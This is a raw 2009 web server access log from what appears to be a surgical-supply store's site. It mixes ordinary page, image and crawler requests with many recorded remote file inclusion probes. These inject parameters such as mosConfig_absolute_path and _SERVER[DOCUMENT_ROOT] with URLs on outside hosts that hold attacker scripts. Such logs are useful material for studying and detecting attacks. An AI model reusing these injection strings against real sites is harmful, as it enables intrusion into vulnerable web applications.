202.64.168.38 - - [06/Jul/2009:00:00:36 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
202.64.168.38 - - [06/Jul/2009:00:00:36 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
202.64.168.38 - - [06/Jul/2009:00:00:41 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
202.64.168.38 - - [06/Jul/2009:00:00:41 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
211.230.156.161 - - [06/Jul/2009:00:00:53 -0400] "GET /logs/access_log.Q109052300%20%20//atom.php5?page=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:00:01:32 -0400] "GET /logs/access_log.Q109052300%20%20//atom.php5?page=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.30.65.36 - - [06/Jul/2009:00:01:44 -0400] "GET /logs/error_log.Q109050900 HTTP/1.0" 200 4206283 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [06/Jul/2009:00:01:59 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.65.36 - - [06/Jul/2009:00:01:48 -0400] "GET /logs/error_log.Q109050900 HTTP/1.0" 200 4206283 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.223.3.98 - - [06/Jul/2009:00:03:17 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gana.net/kboard_v2/kboard/id1.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
202.174.82.220 - - [06/Jul/2009:00:03:22 -0400] "GET /logs/error_log.Q109070200//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.yaco-online.com.br/mambots/tukulid.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
89.223.3.98 - - [06/Jul/2009:00:03:22 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gana.net/kboard_v2/kboard/id1.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
202.174.82.220 - - [06/Jul/2009:00:03:22 -0400] "GET //wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.yaco-online.com.br/mambots/tukulid.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
202.174.82.220 - - [06/Jul/2009:00:03:23 -0400] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.yaco-online.com.br/mambots/tukulid.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.30.65.36 - - [06/Jul/2009:00:03:30 -0400] "GET /logs/error_log.Q109052000 HTTP/1.0" 200 3154855 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.223.3.98 - - [06/Jul/2009:00:03:45 -0400] "GET /logs/access_log.Q109061300%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gana.net/kboard_v2/kboard/id1.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
72.30.65.36 - - [06/Jul/2009:00:03:34 -0400] "GET /logs/error_log.Q109052000 HTTP/1.0" 200 3154855 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.223.3.98 - - [06/Jul/2009:00:03:59 -0400] "GET /logs/access_log.Q109061300%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://gana.net/kboard_v2/kboard/id1.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
77.222.40.247 - - [06/Jul/2009:00:04:41 -0400] "GET /logs/access_log.Q109051300//administrator/components/com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&export.php?mosConfig_absolute_path=http://www.mazda-bay.co.uk/includes/id.txt??? HTTP/1.1" 404 364 "-" "libwww-perl/5.805"
77.222.40.247 - - [06/Jul/2009:00:04:41 -0400] "GET //administrator/components/com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&export.php?mosConfig_absolute_path=http://www.mazda-bay.co.uk/includes/id.txt??? HTTP/1.1" 404 337 "-" "libwww-perl/5.805"
77.222.40.247 - - [06/Jul/2009:00:04:41 -0400] "GET /logs//administrator/components/com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&export.php?mosConfig_absolute_path=http://www.mazda-bay.co.uk/includes/id.txt??? HTTP/1.1" 404 342 "-" "libwww-perl/5.805"
69.123.143.252 - - [06/Jul/2009:00:04:51 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5"
77.222.40.247 - - [06/Jul/2009:00:05:02 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&export.php?mosConfig_absolute_path=http://www.mazda-bay.co.uk/includes/id.txt??? HTTP/1.1" 404 364 "-" "libwww-perl/5.805"
66.11.230.36 - - [06/Jul/2009:00:06:14 -0400] "GET /index.php?pagina=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
66.11.230.36 - - [06/Jul/2009:00:06:18 -0400] "GET /logs/access_log.Q109052500%20%20/index.php?pagina=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.11.230.36 - - [06/Jul/2009:00:06:18 -0400] "GET /logs/index.php?pagina=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
66.11.230.36 - - [06/Jul/2009:00:06:26 -0400] "GET /logs/access_log.Q109060700%20%20/index.php?pagina=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:00:07:00 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.125.38.117 - - [06/Jul/2009:00:07:22 -0400] "GET /logs/access_log.Q109052700//yabbse/Sources/Packages.php?sourcedir=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:00:10:01 -0400] "GET /logs/access_log.Q109052400/ncaster/admin/addons/archive/archive.php?adminfolder=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:00:10:29 -0400] "GET /logs/phprojekt/lib/layout/venus/venus.php?path_pre=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:00:10:29 -0400] "GET /logs/access_log.Q109061000%20%20/phprojekt/lib/layout/venus/venus.php?path_pre=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:00:10:29 -0400] "GET /phprojekt/lib/layout/venus/venus.php?path_pre=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:00:12:00 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.247 - - [06/Jul/2009:00:12:02 -0400] "GET /index.htm HTTP/1.1" 200 870 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
202.64.168.38 - - [06/Jul/2009:00:12:14 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
202.64.168.38 - - [06/Jul/2009:00:12:14 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
202.64.168.38 - - [06/Jul/2009:00:12:21 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
202.64.168.38 - - [06/Jul/2009:00:12:21 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
217.125.38.117 - - [06/Jul/2009:00:13:08 -0400] "GET /logs/access_log.Q109050900//yabbse/Sources/Packages.php?sourcedir=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:00:15:20 -0400] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:00:15:20 -0400] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:00:15:20 -0400] "GET /logs/access_log.Q109051300/ncaster/admin/addons/archive/archive.php?adminfolder=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:00:15:23 -0400] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:00:15:23 -0400] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:00:15:26 -0400] "GET /logs/access_log.Q109051300/ncaster/admin/addons/archive/archive.php?adminfolder=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:00:15:53 -0400] "GET /logs/access_log.Q109062300//components/com_fabrik/plugins/element/fabrikdate/fabrikdate.php?mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:00:16:50 -0400] "GET /logs/access_log.Q109062300//components/com_fabrik/plugins/element/fabrikdate/fabrikdate.php?mosConfig_absolute_path=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:00:16:59 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.70 - - [06/Jul/2009:00:18:16 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Googlebot-Image/1.0"
66.249.68.70 - - [06/Jul/2009:00:18:16 -0400] "GET /images/items/04948401_full.jpg HTTP/1.1" 200 9550 "-" "Googlebot-Image/1.0"
211.115.213.35 - - [06/Jul/2009:00:18:33 -0400] "GET /logs/access_log.Q109052900%20%20//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
72.30.65.36 - - [06/Jul/2009:00:18:41 -0400] "GET /logs/error_log.Q109060800 HTTP/1.0" 200 2993021 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.208.139.72 - - [06/Jul/2009:00:18:41 -0400] "GET /logs/access_log.Q109061100////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:00:18:41 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 8393 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:00:18:42 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:00:18:42 -0400] "GET /logs/access_log.Q109051900////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:00:18:42 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:00:18:43 -0400] "GET /logs/access_log.Q109061100////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:00:18:43 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 8393 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:00:18:43 -0400] "GET /logs/access_log.Q109051900////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:00:18:44 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:00:18:44 -0400] "GET /logs/access_log.Q109061100////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:00:18:44 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 8393 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:00:18:45 -0400] "GET /logs/access_log.Q109051900////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
72.30.65.36 - - [06/Jul/2009:00:18:42 -0400] "GET /logs/error_log.Q109060800 HTTP/1.0" 200 2993021 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
202.64.168.38 - - [06/Jul/2009:00:19:09 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
202.64.168.38 - - [06/Jul/2009:00:19:09 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
202.64.168.38 - - [06/Jul/2009:00:19:12 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
202.64.168.38 - - [06/Jul/2009:00:19:12 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
67.208.139.72 - - [06/Jul/2009:00:19:41 -0400] "GET /logs/access_log.Q109061100%20%20////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:00:19:41 -0400] "GET /logs/access_log.Q109051900%20%20////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
66.11.230.36 - - [06/Jul/2009:00:19:50 -0400] "GET /logs/access_log.Q109052500/index.php?pagina=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:00:19:51 -0400] "GET /logs/access_log.Q109051900%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:00:19:51 -0400] "GET /logs/access_log.Q109061100%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
66.11.230.36 - - [06/Jul/2009:00:19:55 -0400] "GET /logs/access_log.Q109060700/index.php?pagina=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:00:20:06 -0400] "GET /logs/access_log.Q109061100%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:00:20:06 -0400] "GET /logs/access_log.Q109051900%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
74.203.196.99 - - [06/Jul/2009:00:20:14 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.yaco-online.com.br/mambots/test.txt?? HTTP/1.1" 404 245 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
74.203.196.99 - - [06/Jul/2009:00:20:15 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.yaco-online.com.br/mambots/test.txt?? HTTP/1.1" 404 240 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
209.59.12.99 - - [06/Jul/2009:00:22:00 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.208.139.72 - - [06/Jul/2009:00:23:33 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:00:23:33 -0400] "GET /logs/access_log.Q109062700%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:00:23:34 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 8393 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:00:23:34 -0400] "GET /logs/access_log.Q109053000%20%20//logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:00:23:34 -0400] "GET //logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:00:23:34 -0400] "GET /logs//logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:00:23:34 -0400] "GET /logs/access_log.Q109062200%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
209.51.133.202 - - [06/Jul/2009:00:23:38 -0400] "GET /logs/access_log.Q109052500%20%20//logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 302 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:00:23:40 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:00:23:40 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 8393 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:00:23:40 -0400] "GET /logs/access_log.Q109062700%20%20////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:00:23:40 -0400] "GET /logs/access_log.Q109062200%20%20////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
76.26.34.151 - - [06/Jul/2009:00:24:06 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
76.26.34.151 - - [06/Jul/2009:00:24:06 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
76.26.34.151 - - [06/Jul/2009:00:24:06 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
76.26.34.151 - - [06/Jul/2009:00:24:06 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
76.26.34.151 - - [06/Jul/2009:00:24:24 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0 HTTP/1.1" 200 50279 "http://www.acesurgical.com/caso4.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
76.26.34.151 - - [06/Jul/2009:00:24:25 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
76.26.34.151 - - [06/Jul/2009:00:24:25 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
76.26.34.151 - - [06/Jul/2009:00:24:25 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
76.26.34.151 - - [06/Jul/2009:00:24:25 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
76.26.34.151 - - [06/Jul/2009:00:24:25 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
76.26.34.151 - - [06/Jul/2009:00:24:25 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
76.26.34.151 - - [06/Jul/2009:00:24:25 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
76.26.34.151 - - [06/Jul/2009:00:24:25 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
76.26.34.151 - - [06/Jul/2009:00:24:25 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
76.26.34.151 - - [06/Jul/2009:00:24:25 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
76.26.34.151 - - [06/Jul/2009:00:24:25 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
